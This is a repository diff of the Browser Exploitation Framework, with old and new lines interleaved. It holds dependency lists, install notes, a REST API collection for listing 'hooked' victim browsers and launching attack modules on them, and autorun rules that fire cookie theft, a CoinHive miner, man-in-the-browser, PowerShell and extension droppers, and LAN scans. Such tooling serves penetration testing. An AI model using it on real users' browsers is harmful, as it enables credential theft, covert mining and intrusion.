tilt (2.0.11)
timeout (0.3.0)
timers (4.3.3)
tins (1.31.1)
sync
tsort (0.2.0)
tzinfo (2.0.6)
twitter (7.0.0)
addressable (~> 2.3)
buftok (~> 0.2.0)
equalizer (~> 0.0.11)
http (~> 4.0)
http-form_data (~> 2.0)
http_parser.rb (~> 0.6.0)
memoizable (~> 0.4.0)
multipart-post (~> 2.0)
naught (~> 1.0)
simple_oauth (~> 0.3.0)
tzinfo (2.0.5)
concurrent-ruby (~> 1.0)
uglifier (4.2.1)
uglifier (4.2.0)
execjs (>= 0.3.0, < 3)
unicode-display_width (3.2.0)
unicode-emoji (~> 4.1)
unicode-emoji (4.2.0)
uri (1.1.1)
webrick (1.9.1)
websocket (1.2.11)
websocket-client-simple (0.6.1)
unf (0.1.4)
unf_ext
unf_ext (0.0.8.2)
unicode-display_width (2.2.0)
webrick (1.7.0)
websocket (1.2.9)
websocket-client-simple (0.6.0)
event_emitter
websocket
xmlrpc (0.3.3)
xmlrpc (0.3.2)
webrick
xpath (3.2.0)
nokogiri (~> 1.8)
PLATFORMS
aarch64-linux-gnu
aarch64-linux-musl
arm-linux-gnu
arm-linux-musl
arm64-darwin
x86_64-darwin
x86_64-linux-gnu
x86_64-linux-musl
x86_64-linux
DEPENDENCIES
activerecord (~> 8.1)
ansi (~> 1.5)
async (~> 1.32)
async-dns (~> 1.4)
ansi
async-dns
browserstack-local (~> 1.4)
capybara (~> 3.40)
curb (~> 1.2)
em-websocket (~> 0.5.3)
erubis (~> 2.7)
espeak-ruby (~> 1.1.0)
eventmachine (~> 1.2, >= 1.2.7)
execjs (~> 2.10)
geckodriver-helper (~> 0.24.0)
irb (~> 1.16)
capybara
curb
domain_name (>= 0.5.20190701)
em-websocket
erubis
espeak-ruby (>= 1.0.4)
eventmachine
execjs
geckodriver-helper
irb
json
maxmind-db (~> 1.4)
mime-types (~> 3.7)
msfrpc-client (~> 1.1, >= 1.1.2)
maxmind-db
mime-types
msfrpc-client
net-smtp
otr-activerecord (~> 2.6.0)
parseconfig (~> 1.1, >= 1.1.2)
pry-byebug (~> 3.12)
qr4r (~> 0.6.1)
rack (~> 3.2)
rack-protection (~> 4.2.1)
rake (~> 13.3)
rdoc (~> 7.1)
rest-client (~> 2.1.0)
rspec (~> 3.13)
rubocop (~> 1.82.1)
rubyzip (~> 3.2)
rushover (~> 0.3.0)
selenium-webdriver (~> 4.40)
sinatra (~> 4.1)
slack-notifier (~> 2.4)
sqlite3 (~> 2.9)
otr-activerecord (>= 1.4.2)
parseconfig
pry-byebug
qr4r
rack (>= 2.2.4)
rack-protection (>= 2.2.0)
rake (>= 13.0)
rdoc
rest-client (>= 2.1.0)
rspec
rubocop (~> 1.36.0)
rubyzip (>= 1.2.2)
rushover
selenium-webdriver
sinatra (>= 2.2.0)
slack-notifier
sqlite3
term-ansicolor
test-unit-full (~> 0.0.5)
thin (~> 2.0)
uglifier (~> 4.2)
websocket-client-simple (~> 0.6.1)
xmlrpc (~> 0.3.3)
test-unit
test-unit-full
thin
twitter (>= 7.0.0)
uglifier (>= 4.2.0)
unf
websocket-client-simple (~> 0.6.0)
xmlrpc
BUNDLED WITH
2.7.2
2.3.14

8
INSTALL.txt
View File

@@ -1,7 +1,7 @@
===============================================================================
Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - https://beefproject.com
Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
@@ -21,9 +21,9 @@ Or cloning the Git repository from Github:
Prerequisites
--------------
BeEF requires Ruby 3.0+.
BeEF requires Ruby 2.7+.
If your operating system package manager does not support Ruby version 3.0,
If your operating system package manager does not support Ruby version 2.7,
you can add the brightbox ppa repository for the latest version of Ruby:
$ sudo apt-add-repository -y ppa:brightbox/ruby-ng

8
README.md
View File

@@ -1,7 +1,7 @@
===============================================================================
Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - https://beefproject.com
Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
@@ -30,13 +30,13 @@ __Security Bugs:__ security@beefproject.com
__Twitter:__ [@beefproject](https://twitter.com/beefproject)
__Discord:__ https://discord.gg/25wT2P8pwx
__Discord:__ https://discord.gg/ugmKmHarKc
Requirements
------------
* Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
* [Ruby](https://www.ruby-lang.org): 3.0 or newer
* [Ruby](https://www.ruby-lang.org): 2.7 or newer
* [SQLite](http://sqlite.org): 3.x
* [Node.js](https://nodejs.org): 10 or newer
* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile

567
RESTful-API.postman_collection.json Normal file
View File

@@ -0,0 +1,567 @@
{
"info": {
"_postman_id": "3b47c3ff-c03f-446c-8edb-cacaab481425",
"name": "RESTful API",
"schema": "https://schema.getpostman.com/json/collection/v2.1.0/collection.json"
},
"item": [
{
"name": "Authentication",
"event": [
{
"listen": "test",
"script": {
"id": "8e1a5f48-1d41-469d-a153-6cd5ee751912",
"exec": [
"var jsonData = JSON.parse(responseBody);",
"pm.environment.set(\"token\", jsonData.token);"
],
"type": "text/javascript"
}
}
],
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "{\n\t\"username\": \"{{username}}\",\n\t\"password\": \"{{password}}\"\n\t\n}",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/admin/login",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"admin",
"login"
]
},
"description": "In order to use the API, a token parameter must always be added to requests, otherwise a 401 error (Not Authorized) is returned.\n\nA new pseudo-random token is generated each time BeEF starts, using BeEF::Core::Crypto::api_token. The token is added to the BeEF::Configuration object.\n\nWhen BeEF starts the token is printed to the console. It should look something like:\n\n[16:02:47][*] RESTful API key: 320f3cf4da7bf0df7566a517c5db796e73a23f47\nGrabbing the Token from BeEF's API\n\nYou can issue a POST request to /api/admin/login using the BeEF credentials you have set in the main config.yaml file. This request will return the token in the response. You can parse the JSON and use it for your next requests requiring authentication."
},
"response": []
},
{
"name": "Get All Hooked Browsers",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/hooks?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"hooks"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Provides information (browser and OS version, cookies, enabled plugins, etc) about all hooked browsers (both online and offline)."
},
"response": []
},
{
"name": "Get Specific Hooked Browser",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/hooks/{{session}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"hooks",
"{{session}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "\n Provides information (browser and OS version, cookies, enabled plugins, etc) about a specific hooked browser.\n"
},
"response": []
},
{
"name": "Get All Hooked Browsers Logs",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/logs?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"logs"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "The logs handler gives information about all hooked browser's logs, both global and relative."
},
"response": []
},
{
"name": "Get Specific Hooked Browsers Logs",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/logs/{{session}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"logs",
"{{session}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": " The logs handler gives information about a specified hooked browser's logs.\n"
},
"response": []
},
{
"name": "List All Command Modules",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/modules?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "List all available BeEF command modules."
},
"response": []
},
{
"name": "Get Information on Specific Module",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/modules/{{module_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"{{module_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Get detailed information about a specific BeEF command module.\n"
},
"response": []
},
{
"name": "Launch Command Module on a Specific Browser",
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"{{session}}",
"{{module_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Launch a specific BeEF command module on a given hooked browser.\n"
},
"response": []
},
{
"name": "Return Information About Previously Executed Module",
"protocolProfileBehavior": {
"disableBodyPruning": true
},
"request": {
"method": "GET",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}/{{cmd_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"{{session}}",
"{{module_id}}",
"{{cmd_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Returns information about a specific previously launched BeEF command module.\n"
},
"response": []
},
{
"name": "Send a Metasploit Module",
"request": {
"method": "POST",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"{{session}}",
"{{module_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Launch a specific Metasploit module on a given hooked browser\n"
},
"response": []
},
{
"name": " Send a Module to Multiple Hooked Browsers",
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/modules/multi_browser?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"multi_browser"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Fire a new command module to multiple hooked browsers. Returns the command IDs of the launched module, or 0 if firing got issues."
},
"response": []
},
{
"name": " Send Multiple Modules to a Single Hooked Browser",
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/modules/multi_module?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"multi_module"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Fire multiple command modules to a single hooked browser. Returns the command IDs of the launched modules, or 0 if firing got issues."
},
"response": []
},
{
"name": "List the DNS ruleset",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/dns/ruleset?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"dns",
"ruleset"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Returns the current set of DNS rules.\n"
},
"response": []
},
{
"name": "List a Specific DNS Rule",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/dns/rule/{{dnsrule_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"dns",
"rule",
"{{dnsrule_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Returns an individual DNS rule given its unique id.\n"
},
"response": []
},
{
"name": "Add a New DNS Rule",
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/dns/rule?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"dns",
"rule"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Adds a new DNS rule or \"resource record\". Does nothing if rule is already present.\n"
},
"response": []
},
{
"name": "Remove an Existing DNS Rule",
"request": {
"method": "DELETE",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/dns/rule/{{dnsrule_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"dns",
"rule",
"{{dnsrule_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Removes an individual DNS rule with a specified unique ID.\n"
},
"response": []
}
],
"protocolProfileBehavior": {}
}

110
Rakefile
View File

@@ -1,27 +1,28 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'yaml'
require 'bundler/setup'
load 'tasks/otr-activerecord.rake'
#require 'pry-byebug'
task :default => ["spec"]
desc 'Generate API documentation to doc/rdocs/index.html'
task :rdoc do
Rake::Task['rdoc:rerdoc'].invoke
end
## RSPEC
require 'rspec/core/rake_task'
task :default => ["short"]
RSpec::Core::RakeTask.new(:short) do |task|
task.rspec_opts = ['--tag ~run_on_browserstack', '--tag ~run_on_long_tests']
end
RSpec::Core::RakeTask.new(:long) do |task|
RSpec::Core::RakeTask.new(:spec) do |task|
task.rspec_opts = ['--tag ~run_on_browserstack']
end
RSpec::Core::RakeTask.new(:long_only) do |task|
task.rspec_opts = ['--tag ~run_on_browserstack', '--tag run_on_long_tests']
end
################################
# Browserstack
RSpec::Core::RakeTask.new(:browserstack) do |task|
task.rspec_opts = ['--tag run_on_browserstack']
end
@@ -54,7 +55,7 @@ namespace :ssl do
end
Rake::Task['ssl:replace'].invoke
end
desc 'Re-generate SSL certificate'
task :replace do
if File.file?('/usr/local/bin/openssl')
@@ -69,14 +70,6 @@ namespace :ssl do
end
end
################################
# Generate API documentation
desc 'Generate API documentation to doc/rdocs/index.html'
task :rdoc do
Rake::Task['rdoc:rerdoc'].invoke
end
################################
# rdoc
@@ -95,6 +88,15 @@ namespace :rdoc do
end
end
################################
# Install
#task :install do
# sh "export BEEF_TEST=true"
#end
################################
# X11 set up
@@ -122,6 +124,7 @@ end
@beef_process_id = nil;
@beef_config_file = 'tmp/rk_beef_conf.yaml';
task :beef_start => 'beef' do
# read environment param for creds or use bad_fred
test_user = ENV['TEST_BEEF_USER'] || 'bad_fred'
@@ -131,7 +134,7 @@ task :beef_start => 'beef' do
config = YAML.safe_load(File.read('./config.yaml'))
config['beef']['credentials']['user'] = test_user
config['beef']['credentials']['passwd'] = test_pass
Dir.mkdir('tmp') unless Dir.exist?('tmp')
Dir.mkdir('tmp') unless Dir.exists?('tmp')
File.open(@beef_config_file, 'w') { |f| YAML.dump(config, f) }
# set the environment creds -- in case we're using bad_fred
@@ -196,6 +199,61 @@ file '/tmp/msf-test/msfconsole' do
sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
end
################################
# Create Mac DMG File
task :dmg do
puts "\nCreating Working Directory\n";
sh "mkdir dmg";
sh "mkdir dmg/BeEF";
sh "rsync * dmg/BeEF --exclude=dmg -r";
sh "ln -s /Applications dmg/";
puts "\nCreating DMG File\n"
sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
puts "\nCleaning Up\n"
sh "rm -r dmg";
puts "\nBeEF.dmg created\n"
end
################################
# Create CDE Package
# This will download and make the CDE Executable and
# gnereate a CDE Package in cde-package
task :cde do
puts "\nCloning and Making CDE...";
sh "git clone git://github.com/pgbovine/CDE.git";
Dir.chdir "CDE";
sh "make";
Dir.chdir "..";
puts "\nCreating CDE Package...\n";
sh "bundle install"
Rake::Task['cde_beef_start'].invoke
Rake::Task['beef_stop'].invoke
puts "\nCleaning Up...\n";
sleep (2);
sh "rm -rf CDE";
puts "\nCDE Package Created...\n";
end
################################
# CDE/BeEF environment set up
@beef_process_id = nil;
task :cde_beef_start => 'beef' do
printf "Starting CDE BeEF (wait 10 seconds)..."
@beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
printf '.'
sleep (i)
end
puts '.'
end
################################
# ActiveRecord
namespace :db do

6
VERSION
View File

@@ -1,7 +1,7 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
0.6.0.0
0.5.4.0

4
arerules/alert.json
View File

@@ -1,5 +1,9 @@
{"name": "Display an alert",
"author": "mgeeky",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "alert_dialog",
"condition": null,

20
arerules/coinhive_miner.json Normal file
View File

@@ -0,0 +1,20 @@
{"name": "Start CoinHive JavaScript miner",
"author": "bcoles",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "coinhive_miner",
"condition": null,
"options": {
"public_token":"Ofh5MIvjuCBDqwJ9TCTio7TYko0ig5TV",
"mode":"FORCE_EXCLUSIVE_TAB",
"mobile_enabled":""
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}

4
arerules/confirm_close_tab.json
View File

@@ -1,5 +1,9 @@
{"name": "Confirm Close Tab",
"author": "mgeeky",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "confirm_close_tab",
"condition": null,

3
arerules/ff_osx_extension-dropper.json
View File

@@ -2,6 +2,7 @@
"name": "Firefox Extension Dropper",
"author": "antisnatchor",
"browser": "FF",
"browser_version": "ALL",
"os": "OSX",
"os_version": ">= 10.8",
"modules": [{
@@ -16,4 +17,4 @@
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
}

4
arerules/get_cookie.json
View File

@@ -1,6 +1,10 @@
{
"name": "Get Cookie",
"author": "@benichmt1",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_cookie",
"condition": null,

1
arerules/ie_win_htapowershell.json
View File

@@ -2,6 +2,7 @@
"name": "HTA PowerShell",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "ALL",
"os": "Windows",
"os_version": ">= 7",
"modules": [

3
arerules/lan_cors_scan.json
View File

@@ -1,6 +1,9 @@
{"name": "LAN CORS Scan",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,

4
arerules/lan_cors_scan_common.json
View File

@@ -1,5 +1,9 @@
{"name": "LAN CORS Scan (Common IPs)",
"author": "bcoles",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "cross_origin_scanner_cors",
"condition": null,

3
arerules/lan_fingerprint.json
View File

@@ -1,6 +1,9 @@
{"name": "LAN Fingerprint",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,

4
arerules/lan_fingerprint_common.json
View File

@@ -1,5 +1,9 @@
{"name": "LAN Fingerprint (Common IPs)",
"author": "antisnatchor",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "internal_network_fingerprinting",
"condition": null,

3
arerules/lan_flash_scan.json
View File

@@ -1,6 +1,9 @@
{"name": "LAN Flash Scan",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,

3
arerules/lan_flash_scan_common.json
View File

@@ -1,6 +1,9 @@
{"name": "LAN Flash Scan (Common IPs)",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "cross_origin_scanner_flash",
"condition": null,

3
arerules/lan_http_scan.json
View File

@@ -1,6 +1,9 @@
{"name": "LAN HTTP Scan",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,

4
arerules/lan_http_scan_common.json
View File

@@ -1,5 +1,9 @@
{"name": "LAN HTTP Scan (Common IPs)",
"author": "bcoles",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_http_servers",
"condition": null,

3
arerules/lan_ping_sweep.json
View File

@@ -1,6 +1,9 @@
{"name": "LAN Ping Sweep",
"author": "bcoles",
"browser": "FF",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,

3
arerules/lan_ping_sweep_common.json
View File

@@ -1,6 +1,9 @@
{"name": "LAN Ping Sweep (Common IPs)",
"author": "bcoles",
"browser": "FF",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "ping_sweep",
"condition": null,

4
arerules/lan_port_scan.json
View File

@@ -1,5 +1,9 @@
{"name": "LAN Port Scan",
"author": "aburro & aussieklutz",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,

4
arerules/lan_sw_port_scan.json
View File

@@ -1,5 +1,9 @@
{"name": "LAN SW Port Scan",
"author": "aburro & aussieklutz",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,

4
arerules/man_in_the_browser.json
View File

@@ -1,5 +1,9 @@
{"name": "Perform Man-In-The-Browser",
"author": "mgeeky",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "man_in_the_browser",
"condition": null,

4
arerules/raw_javascript.json
View File

@@ -1,6 +1,10 @@
{
"name": "Raw JavaScript",
"author": "wade@bindshell.net",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "raw_javascript",
"condition": null,

4
arerules/record_snapshots.json
View File

@@ -1,5 +1,9 @@
{"name": "Collects multiple snapshots of the webpage within Same-Origin",
"author": "mgeeky",
"browser": ["FF", "C", "O", "IE", "S"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "spyder_eye",
"condition": null,

3
arerules/win_fake_malware.json
View File

@@ -2,7 +2,10 @@
{
"name": "Windows Fake Malware",
"author": "bcoles",
"browser": "ALL",
"browser_version": "ALL",
"os": "Windows",
"os_version": "ALL",
"modules": [
{
"name": "blockui",

24
beef
View File

@@ -1,8 +1,8 @@
#!/usr/bin/env ruby
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -12,9 +12,9 @@
$VERBOSE = nil
#
# @note Version check to ensure BeEF is running Ruby 3.0+
# @note Version check to ensure BeEF is running Ruby 2.7+
#
min_ruby_version = '3.0'
min_ruby_version = '2.7'
if RUBY_VERSION < min_ruby_version
puts
puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version #{min_ruby_version} or later."
@@ -39,10 +39,6 @@ $root_dir = File.join(File.expand_path(File.dirname(File.realpath(__FILE__))), '
$:.unshift($root_dir)
$home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
# @note Parse BeEF CLI options early (prevents Rack help from taking over)
require 'core/main/console/commandline'
BeEF::Core::Console::CommandLine.parse
#
# @note Require core loader
#
@@ -189,7 +185,7 @@ db_file = config.get('beef.database.file')
if BeEF::Core::Console::CommandLine.parse[:resetdb]
print_info 'Resetting the database for BeEF.'
begin
File.delete(db_file) if File.exist?(db_file)
File.delete(db_file) if File.exists?(db_file)
rescue => e
print_error("Could not remove '#{db_file}' database file: #{e.message}")
exit(1)
@@ -198,6 +194,7 @@ end
# Connect to DB
ActiveRecord::Base.logger = nil
OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database:db_file)
# otr-activerecord require you to manually establish the connection with the following line
#Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems.
@@ -206,13 +203,10 @@ if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2')
end
# Migrate (if required)
ActiveRecord::Migration.verbose = false # silence activerecord migration stdout messages
ActiveRecord::Migrator.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
context = ActiveRecord::MigrationContext.new(ActiveRecord::Migrator.migrations_paths)
context = ActiveRecord::Migration.new.migration_context
if context.needs_migration?
ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration, context.internal_metadata).migrate
ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate
end
#
# @note Extensions may take a moment to load, thus we print out a please wait message
#
@@ -248,8 +242,6 @@ BeEF::Core::Console::Banners.print_loaded_extensions
BeEF::Core::Console::Banners.print_loaded_modules
BeEF::Core::Console::Banners.print_network_interfaces_count
BeEF::Core::Console::Banners.print_network_interfaces_routes
BeEF::Core::Console::Banners.print_http_proxy
BeEF::Core::Console::Banners.print_dns
#
# @note Prints the API key needed to use the RESTful API

48
config.yaml
View File

@@ -1,12 +1,12 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.6.0.0'
version: '0.5.4.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
@@ -45,23 +45,22 @@ beef:
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Public Domain Name / Reverse Proxy / Port Forwarding
#
# In order for the client-side BeEF JavaScript hook to be able to connect to BeEF,
# the hook JavaScript needs to be generated with the correct connect-back details.
#
# If you're using a public domain name, reverse proxy, or port forwarding you must
# configure the public-facing connection details here.
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# These settings will be used to create a public facing URL
# This public facing URL will be used for all hook related calls
# set the public setting below:
# public:
# host: "" # public hostname/IP address
# port: "" # public port will default to 80 if no https 443 if https
# and local if not set but there is a public host
# https: false # true/false
#public:
# host: "beef.local" # public hostname/IP address
# port: "443" # public port (443 if the public server is using HTTPS)
# https: false # true/false
# If using any reverse proxy you should also set allow_reverse_proxy to true below.
# Note that this causes the BeEF server to trust the X-Forwarded-For HTTP header.
# If the BeEF server is directly accessible, clients can spoof their connecting
# IP address using this header to bypass the IP address permissions/exclusions.
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
# Hook
@@ -94,6 +93,8 @@ beef:
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# Enabled this config setting if you're external facing uri is using https
public_enabled: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
@@ -124,6 +125,13 @@ beef:
# GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
